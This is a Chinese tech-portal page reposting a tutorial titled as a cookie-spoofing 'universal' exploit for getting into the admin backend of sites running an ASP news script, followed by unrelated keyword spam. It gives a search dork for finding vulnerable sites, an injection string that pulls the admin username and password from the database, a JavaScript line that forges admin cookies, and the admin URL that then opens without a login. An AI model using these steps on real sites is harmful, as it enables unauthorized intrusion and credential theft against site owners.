千家信息网

请输入关键字词

热门搜索排行

最新搜索排行

导航: 首页 > 网络安全 >

COOKIES欺骗通杀漏洞进后台

发表于:2024-11-27 作者:千家信息网编辑
千家信息网最后更新 2024年11月27日,在谷歌里搜索:inurl:news_more.asp?lm2=搜索到如下站点:http://www.*********/news_more.asp?lm2=1691.将"/news_more.asp?
千家信息网最后更新 2024年11月27日COOKIES欺骗通杀漏洞进后台

在谷歌里搜索:inurl:news_more.asp?lm2=

搜索到如下站点:http://www.*********/news_more.asp?lm2=169

1.将"/news_more.asp?lm2=169"替换成"/admin/admin_news_pl_view.asp?id=1"

2.将 |'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username=' 粘贴到如下框内,修改保存。


3.




alert([xss_clean]="adminuser=" + escape("1"));alert([xss_clean]="adminpass=" + escape("2")); 代码拷贝进浏览器,回车;(注:标红1处填上图中1内容,2处填上图中2内容)

点击确定。

点击确定。

5.将地址 http://www.*********/admin/admin_news_pl_view.asp?id=1 改成 http://www.*********/admin/admin_index.asp 回车,即可不用登录直接进入后台了。如图,


很赞哦!
上图 内容 搜索 后台 不用 代码 地址 拷贝 浏览器 站点 如图 浏览 登录 漏洞 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 软件开发的软考适合考什么 竹溪正规软件开发学习 开源环境下的数据库 合肥雪崩科技互联网有限公司 江西南昌dns服务器虚拟主机 丽江互联网科技有什么专业 网络安全留言有哪些 南京水一滴网络技术有限公司 中国5g网络技术和NFV 维普数据库高级检索如何使用 滑县软件开发培训机构 华为智慧屏 怎么连服务器 互联网保险软件开发 安徽工业软件开发批发价 国外先进的网络安全产品 数据库怎样取消升序 计算机网络技术结果与体会 服务器存储方式常用的阵列 哈尔滨app软件开发商 疫情期间服务器上市公司 云服务器运行大型游戏 qnx 软件开发 没后缀的数据库文件 数据库如何取最大的两个值 企业级服务器排名 某局2020年网络安全工作总结 太原网络安全实战培训班住宿 跟域名服务器分布 吉林软件开发厂家现货 无线网络安全内容

相关文章

0